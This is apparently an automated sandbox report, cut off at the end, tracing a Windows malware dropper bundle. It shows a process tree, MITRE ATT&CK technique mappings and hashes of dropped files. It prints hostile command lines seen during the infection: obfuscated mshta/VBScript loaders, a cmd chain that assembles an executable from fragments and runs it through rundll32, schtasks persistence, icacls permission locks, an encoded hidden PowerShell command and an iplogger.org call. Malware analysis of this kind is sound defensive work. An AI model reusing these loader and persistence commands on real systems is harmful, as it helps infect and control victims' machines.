        "C:\Users\Admin\Pictures\Adobe Films\fN2ySncAYU9kj62APWytTkON.exe"
        5⤵
        
        PID:2384
    - - C:\Users\Admin\Pictures\Adobe Films\UZvxQc9JqZmN4zalNoGiKj0j.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\UZvxQc9JqZmN4zalNoGiKj0j.exe"
        5⤵
        
        PID:5216
    - - C:\Users\Admin\Pictures\Adobe Films\3Gk95B_GPFHWiUguN8xohL9n.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3Gk95B_GPFHWiUguN8xohL9n.exe"
        5⤵
        
        PID:5200
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        6⤵
        
        PID:5976
    - - C:\Users\Admin\Pictures\Adobe Films\KxTR7RuGY0HKsK2uMYwIloj4.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\KxTR7RuGY0HKsK2uMYwIloj4.exe"
        5⤵
        
        PID:5344
      - C:\Windows\SysWOW64\robocopy.exe
        
        robocopy 8927387376487263745672673846276374982938486273568279384982384972834
        6⤵
        
        PID:5596
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Interests.vss & ping -n 5 localhost
        6⤵
        
        PID:54792
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        7⤵
        
        PID:55848
    - - C:\Users\Admin\Pictures\Adobe Films\8_NYosyHAt0B78xDRzFioqV0.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\8_NYosyHAt0B78xDRzFioqV0.exe"
        5⤵
        
        PID:5192
      - C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe
        
        "C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"
        6⤵
        
        PID:38748
    - - C:\Users\Admin\Pictures\Adobe Films\oSoShBDfcOXfftqE6Fu4iP4D.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\oSoShBDfcOXfftqE6Fu4iP4D.exe"
        5⤵
        
        PID:5172
    - - C:\Users\Admin\Pictures\Adobe Films\GGr4ZWGb1TeonxgrEqlsoIek.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\GGr4ZWGb1TeonxgrEqlsoIek.exe"
        5⤵
        
        PID:5164
      - C:\Users\Admin\AppData\Local\Temp\is-OG60S.tmp\GGr4ZWGb1TeonxgrEqlsoIek.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OG60S.tmp\GGr4ZWGb1TeonxgrEqlsoIek.tmp" /SL5="$702B0,3267745,979456,C:\Users\Admin\Pictures\Adobe Films\GGr4ZWGb1TeonxgrEqlsoIek.exe"
        6⤵
        
        PID:5576
        
        C:\Users\Admin\AppData\Roaming\java.exe
        
        "C:\Users\Admin\AppData\Roaming\java.exe"
        7⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe"
        8⤵
        
        PID:9788
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe"
        9⤵
        
        PID:38816
    - - C:\Users\Admin\Pictures\Adobe Films\KQeGxKTXvLs68FpVJ5EuPBPZ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\KQeGxKTXvLs68FpVJ5EuPBPZ.exe"
        5⤵
        
        PID:1984
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1984 -s 476
        6⤵
        Program crash
        
        PID:8324
    - - C:\Users\Admin\Pictures\Adobe Films\Z4YOqPngheYjkAMgKr7wz6Oe.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Z4YOqPngheYjkAMgKr7wz6Oe.exe"
        5⤵
        
        PID:4396
      - C:\Users\Admin\Pictures\Adobe Films\Z4YOqPngheYjkAMgKr7wz6Oe.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Z4YOqPngheYjkAMgKr7wz6Oe.exe" -h
        6⤵
        
        PID:27412
    - - C:\Users\Admin\Pictures\Adobe Films\K8QbU32n_pKutMBbUzDDHRCk.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\K8QbU32n_pKutMBbUzDDHRCk.exe"
        5⤵
        
        PID:4144
      - C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" QBACSNy.g /U -s
        6⤵
        
        PID:9872
    - - C:\Users\Admin\Pictures\Adobe Films\5IiV6NbRu7RqQNYDdzR7Vp_w.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\5IiV6NbRu7RqQNYDdzR7Vp_w.exe"
        5⤵
        
        PID:5092
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 252
        6⤵
        Program crash
        
        PID:63388
    - - C:\Users\Admin\Pictures\Adobe Films\UygtTHvbjQy5IB6k_KtNtWSh.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\UygtTHvbjQy5IB6k_KtNtWSh.exe"
        5⤵
        
        PID:5076
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:77264
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:77256
      - C:\Users\Admin\Documents\i8tBHSt4c0NvG2IioxQoiu21.exe
        
        "C:\Users\Admin\Documents\i8tBHSt4c0NvG2IioxQoiu21.exe"
        6⤵
        
        PID:77244
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 77244 -s 1788
        7⤵
        Program crash
        
        PID:3916
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 77244 -s 1812
        7⤵
        Program crash
        
        PID:2316
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 77244 -s 1824
        7⤵
        Program crash
        
        PID:6632
    - - C:\Users\Admin\Pictures\Adobe Films\nGKx9eRlMDSQ77zYvVOYDdKX.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\nGKx9eRlMDSQ77zYvVOYDdKX.exe"
        5⤵
        
        PID:3148
    - - C:\Users\Admin\Pictures\Adobe Films\ySltFo95K7yjgWEDCLtjotm7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ySltFo95K7yjgWEDCLtjotm7.exe"
        5⤵
        
        PID:5472
      - C:\Users\Admin\Pictures\Adobe Films\ySltFo95K7yjgWEDCLtjotm7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ySltFo95K7yjgWEDCLtjotm7.exe"
        6⤵
        
        PID:63400
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Users\Admin\AppData\Local\0025fcf8-6509-41d9-90eb-35a7f1ee7a97" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        7⤵
        Modifies file permissions
        
        PID:4688
        
        C:\Users\Admin\Pictures\Adobe Films\ySltFo95K7yjgWEDCLtjotm7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ySltFo95K7yjgWEDCLtjotm7.exe" --Admin IsNotAutoStart IsNotTask
        7⤵
        
        PID:7612
        
        C:\Users\Admin\Pictures\Adobe Films\ySltFo95K7yjgWEDCLtjotm7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ySltFo95K7yjgWEDCLtjotm7.exe" --Admin IsNotAutoStart IsNotTask
        8⤵
        
        PID:52252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00d2c24efd1c9e2c.exe
    3⤵
    PID:3864
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00d2c24efd1c9e2c.exe
      Mon00d2c24efd1c9e2c.exe
      4⤵
      Executes dropped EXE
      PID:4872
    - - C:\Users\Admin\AppData\Local\Temp\is-E6KUU.tmp\Mon00d2c24efd1c9e2c.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-E6KUU.tmp\Mon00d2c24efd1c9e2c.tmp" /SL5="$601C0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00d2c24efd1c9e2c.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        
        PID:4808
      - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00d2c24efd1c9e2c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00d2c24efd1c9e2c.exe" /SILENT
        6⤵
        Executes dropped EXE
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\is-3BA4O.tmp\Mon00d2c24efd1c9e2c.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3BA4O.tmp\Mon00d2c24efd1c9e2c.tmp" /SL5="$701C0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00d2c24efd1c9e2c.exe" /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon00ad5267c95.exe
    3⤵
    PID:3336
  - - C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00ad5267c95.exe
      Mon00ad5267c95.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      PID:4380
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00ad5267c95.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00ad5267c95.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        5⤵
        Checks computer location settings
        
        PID:4604
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00ad5267c95.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon00ad5267c95.exe") do taskkill /F -Im "%~NxU"
        6⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F -Im "Mon00ad5267c95.exe"
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\09xU.exE
        
        09xU.EXE -pPtzyIkqLZoCarb5ew
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:3008
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        8⤵
        Checks computer location settings
        
        PID:3392
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
        9⤵
        
        PID:4316
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
        8⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4576
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
        9⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eCHO "
        10⤵
        
        PID:1524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
        10⤵
        
        PID:5076
        
        C:\Windows\SysWOW64\control.exe
        
        control .\R6f7sE.I
        10⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
        11⤵
        Loads dropped DLL
        
        PID:2352
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
        12⤵
        
        PID:3496
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
        13⤵
        Suspicious use of SetThreadContext
        
        PID:3528
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 616
    3⤵
    - Program crash
    PID:4796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4864 -ip 4864
1⤵
PID:1660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3840 -ip 3840
1⤵
PID:1264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3840 -ip 3840
1⤵
PID:1540

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 600
  2⤵
  - Program crash
  PID:3944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2272 -ip 2272
1⤵
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1664 -ip 1664
1⤵
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3840 -ip 3840
1⤵
PID:3040

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3840 -ip 3840
1⤵
PID:1404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3840 -ip 3840
1⤵
PID:2220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3840 -ip 3840
1⤵
PID:1092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3840 -ip 3840
1⤵
PID:3832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3840 -ip 3840
1⤵
PID:2700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3840 -ip 3840
1⤵
PID:3332

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv VtAqfG7I8UqsbvlUmQBFWQ.0.2
1⤵
PID:2984

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 520 -p 1984 -ip 1984
1⤵
PID:5628

C:\Users\Admin\Pictures\Adobe Films\QowVg8aN0zCf2h1NxUOEIIyd.exe
"C:\Users\Admin\Pictures\Adobe Films\QowVg8aN0zCf2h1NxUOEIIyd.exe"
1⤵
PID:10204
- C:\Users\Admin\AppData\Local\Temp\M298DM884EI2374.exe
  "C:\Users\Admin\AppData\Local\Temp\M298DM884EI2374.exe"
  2⤵
  PID:35324
- - C:\Users\Admin\AppData\Local\Temp\M298DM884EI2374.exe
    "C:\Users\Admin\AppData\Local\Temp\M298DM884EI2374.exe"
    3⤵
    PID:38908
- C:\Users\Admin\AppData\Local\Temp\1E07CA5L14KAEKE.exe
  "C:\Users\Admin\AppData\Local\Temp\1E07CA5L14KAEKE.exe"
  2⤵
  PID:38788
- - C:\Users\Admin\AppData\Local\Temp\1E07CA5L14KAEKE.exe
    "C:\Users\Admin\AppData\Local\Temp\1E07CA5L14KAEKE.exe"
    3⤵
    PID:45468
- C:\Users\Admin\AppData\Local\Temp\1E07CA5L14KAEKE.exe
  "C:\Users\Admin\AppData\Local\Temp\1E07CA5L14KAEKE.exe"
  2⤵
  PID:38764
- C:\Users\Admin\AppData\Local\Temp\5F4A8888BE2HE55.exe
  https://iplogger.org/1x5az7
  2⤵
  PID:45492
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" AI8vTZ.V -U -S
    3⤵
    PID:59188
- C:\Users\Admin\AppData\Local\Temp\5F4A8888BE2HE55.exe
  "C:\Users\Admin\AppData\Local\Temp\5F4A8888BE2HE55.exe"
  2⤵
  PID:45460
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" AI8vTZ.V -U -S
    3⤵
    PID:63704

C:\Users\Admin\AppData\Local\Temp\is-4O5BO.tmp\7u_JYevE3lwSnWF2xKaWA3St.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4O5BO.tmp\7u_JYevE3lwSnWF2xKaWA3St.tmp" /SL5="$601E6,3267745,979456,C:\Users\Admin\Pictures\Adobe Films\7u_JYevE3lwSnWF2xKaWA3St.exe"
1⤵
PID:4312
- C:\Users\Admin\AppData\Roaming\java.exe
  "C:\Users\Admin\AppData\Roaming\java.exe"
  2⤵
  PID:16288

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 8332 -ip 8332
1⤵
PID:13772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:17264
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  PID:65124

C:\Users\Admin\AppData\Local\Temp\1E07CA5L14KAEKE.exe
"C:\Users\Admin\AppData\Local\Temp\1E07CA5L14KAEKE.exe"
1⤵
PID:38684

C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe
"C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"
1⤵
PID:38800
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im "dllhusts.exe" /f & erase "C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe" & exit
  2⤵
  PID:3640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im "dllhusts.exe" /f
    3⤵
    - Kills process with taskkill
    PID:6156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5092 -ip 5092
1⤵
PID:57264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 9768 -ip 9768
1⤵
PID:64008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 77244 -ip 77244
1⤵
PID:6096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 77244 -ip 77244
1⤵
PID:6116

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:1532
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  PID:5240
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 608
    3⤵
    - Program crash
    PID:6228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5240 -ip 5240
1⤵
- Loads dropped DLL
PID:3528

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:6300
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  PID:6328
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 608
    3⤵
    - Program crash
    PID:6548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6328 -ip 6328
1⤵
PID:6420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 77244 -ip 77244
1⤵
PID:6440

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 488 -p 6688 -ip 6688
1⤵
PID:7192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6760 -ip 6760
1⤵
PID:7916

C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe
"C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"
1⤵
PID:7988
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im "dllhusts.exe" /f & erase "C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe" & exit
  2⤵
  PID:54836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im "dllhusts.exe" /f
    3⤵
    - Kills process with taskkill
    PID:55864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3840 -ip 3840
1⤵
PID:54756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3840 -ip 3840
1⤵
PID:55548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:55808

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
ec8ff3b1ded0246437b1472c69dd1811

SHA1
d813e874c2524e3a7da6c466c67854ad16800326

SHA256
e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

SHA512
e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
60265634e374918102fc2453e60e2904

SHA1
6d41d78525ddec7953b1e3bc3fe7a8986d8d9317

SHA256
86318ed526c56d3c8e39064376f6dfaa5195022342c98f706357ae88f312057b

SHA512
41a738aecec788158a92c510d6b2c1bacffcc45112b949bb8ee26e2afa5896b0be1dace3291ff4f4e7166e4320c9b064036e9c0ab1c576108bd21b8033602bf6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Mon003592a9c9.exe.log

Filesize
700B

MD5
e5352797047ad2c91b83e933b24fbc4f

SHA1
9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772

SHA256
b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c

SHA512
dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Mon00494c6467b7bab5.exe.log

Filesize
700B

MD5
e5352797047ad2c91b83e933b24fbc4f

SHA1
9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772

SHA256
b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c

SHA512
dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

Download Submit
C:\Users\Admin\AppData\Local\Temp\09xU.exE

Filesize
1.2MB

MD5
7c6b2dc2c253c2a6a3708605737aa9ae

SHA1
cf4284f29f740b4925fb2902f7c3f234a5744718

SHA256
b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

SHA512
19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

Download Submit
C:\Users\Admin\AppData\Local\Temp\09xU.exE

Filesize
1.2MB

MD5
7c6b2dc2c253c2a6a3708605737aa9ae

SHA1
cf4284f29f740b4925fb2902f7c3f234a5744718

SHA256
b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

SHA512
19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon001871a94f.exe

Filesize
402KB

MD5
d08cc10c7c00e13dfb01513f7f817f87

SHA1
f3adddd06b5d5b3f7d61e2b72860de09b410f571

SHA256
0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d

SHA512
0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon001871a94f.exe

Filesize
402KB

MD5
d08cc10c7c00e13dfb01513f7f817f87

SHA1
f3adddd06b5d5b3f7d61e2b72860de09b410f571

SHA256
0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d

SHA512
0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon001b59f8accf32131.exe

Filesize
442KB

MD5
2de8d046d57fa60509800b164868a881

SHA1
905be498f9490445da60c9ee457de1e8411ce074

SHA256
02883fa63667972547fe36023646554c3d2895b41c5a8683ab5b2292f5d2d464

SHA512
addb7b321517a94e1c4da2835178063a739ec01fa6d2e23b8221a50b6d6371b298e5f25a4bbc13d7e3990ab6116f50907e8d7409ee123824c6579fe5f6597735

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon001b59f8accf32131.exe

Filesize
442KB

MD5
2de8d046d57fa60509800b164868a881

SHA1
905be498f9490445da60c9ee457de1e8411ce074

SHA256
02883fa63667972547fe36023646554c3d2895b41c5a8683ab5b2292f5d2d464

SHA512
addb7b321517a94e1c4da2835178063a739ec01fa6d2e23b8221a50b6d6371b298e5f25a4bbc13d7e3990ab6116f50907e8d7409ee123824c6579fe5f6597735

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC92E2926\Mon003592a9c9.exe

Filesize
421KB

MD5
